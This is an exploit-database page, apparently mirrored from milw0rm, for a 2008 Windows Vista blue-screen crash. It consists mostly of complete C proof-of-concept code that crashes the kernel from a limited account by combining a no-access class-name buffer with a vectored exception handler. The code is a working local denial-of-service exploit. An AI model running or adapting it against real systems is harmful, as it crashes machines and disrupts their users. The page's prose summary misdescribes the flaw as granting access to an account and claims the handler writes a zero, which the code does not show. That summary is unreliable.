Windows Vista BSoD (Access violation) from limited account.

vendor:

Windows Vista

by:

Defsanguje

7.2

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Windows Vista

Affected Version From: Windows Vista Home Premium & Ultimate

Affected Version To: Windows Vista Home Premium & Ultimate

Patch Exists: No

Related CWE: N/A

CPE: o:microsoft:windows_vista

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2008

Windows Vista BSoD (Access violation) from limited account.

This exploit is a buffer overflow vulnerability in Windows Vista. It allows an attacker to gain access to a limited account by exploiting a vulnerability in the Windows Vista kernel. The exploit works by setting up a vectored exception handler and then writing to a protected memory address. This causes an access violation exception to be thrown, which is then handled by the exception handler. The exception handler then writes a 0 to the memory address, allowing the attacker to gain access to the limited account.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all users have the least privileges necessary to perform their tasks. This will limit the damage that can be done if an attacker is able to exploit this vulnerability.

Source

Exploit-DB raw data:

// //////////////////////////////////////////////////////////////
// Windows Vista BSoD (Access violation) from limited account. //
// Tested on Home Premium & Ultimate @ October 05 2008         //
/////////////////////////////////////////////////////////////////
#include <stdio.h>
#include <windows.h>

WCHAR szClass[] = L"BSODClass";

int ExceptionHandler(EXCEPTION_POINTERS* lpExceptionInfo);
typedef void (WINAPI* pFunc)(ULONG ulFirst, LPVOID lpHandler);
pFunc pRtlAddVectoredExceptionHandler;

typedef struct
{
    DWORD dwWriteViolation;
    LPVOID lpAddress;
} EXCEPTION_ACCESS_VIOLATION_PARAMS;

int main()
{
    WNDCLASSW wc;
    DWORD dwOldProt;

    printf("Windows Vista BSoD from usermode/limited account.\n"
           "Coded by. Defsanguje - October 05 2008\n");

    // Setup vectored exception handler. SEH would work also.
    pRtlAddVectoredExceptionHandler = (pFunc)GetProcAddress((HMODULE)GetModuleHandle("ntdll.dll"),
                                                            "RtlAddVectoredExceptionHandler");
    (*pRtlAddVectoredExceptionHandler)(TRUE, ExceptionHandler);

    // Dummy data
    wc.style         = 0;
    wc.lpfnWndProc   = NULL;
    wc.cbClsExtra    = 0;
    wc.cbWndExtra    = 0;
    wc.hInstance     = GetModuleHandle(NULL);
    wc.hIcon         = NULL;
    wc.hCursor       = LoadCursor(NULL, IDC_ARROW);
    wc.hbrBackground = GetStockObject(HOLLOW_BRUSH);
    wc.lpszMenuName  = NULL;
    wc.lpszClassName = szClass;

    VirtualProtect(szClass, 1, PAGE_NOACCESS, &dwOldProt);
    RegisterClassW(&wc);

    printf("You shouldn't see this");
    return 0;
}

int ExceptionHandler(EXCEPTION_POINTERS* lpExceptionInfo)
{
    static LPVOID lpLastAddress;
    static DWORD dwOldProt;
    EXCEPTION_ACCESS_VIOLATION_PARAMS* avParams;
    switch(lpExceptionInfo->ExceptionRecord->ExceptionCode)
    {
        case EXCEPTION_ACCESS_VIOLATION:
            avParams = (EXCEPTION_ACCESS_VIOLATION_PARAMS*)lpExceptionInfo->ExceptionRecord->ExceptionInformation;
            VirtualProtect(avParams->lpAddress, 1, PAGE_READWRITE, &dwOldProt);
            lpLastAddress = avParams->lpAddress;

            // Set trap flag
            lpExceptionInfo->ContextRecord->EFlags |= 0x100;
            break;
        case STATUS_SINGLE_STEP:
            VirtualProtect(lpLastAddress, 1, PAGE_NOACCESS, &dwOldProt);
            break;
        default:
            break;
    }
    return EXCEPTION_CONTINUE_EXECUTION;
;
}

// milw0rm.com [2008-10-04]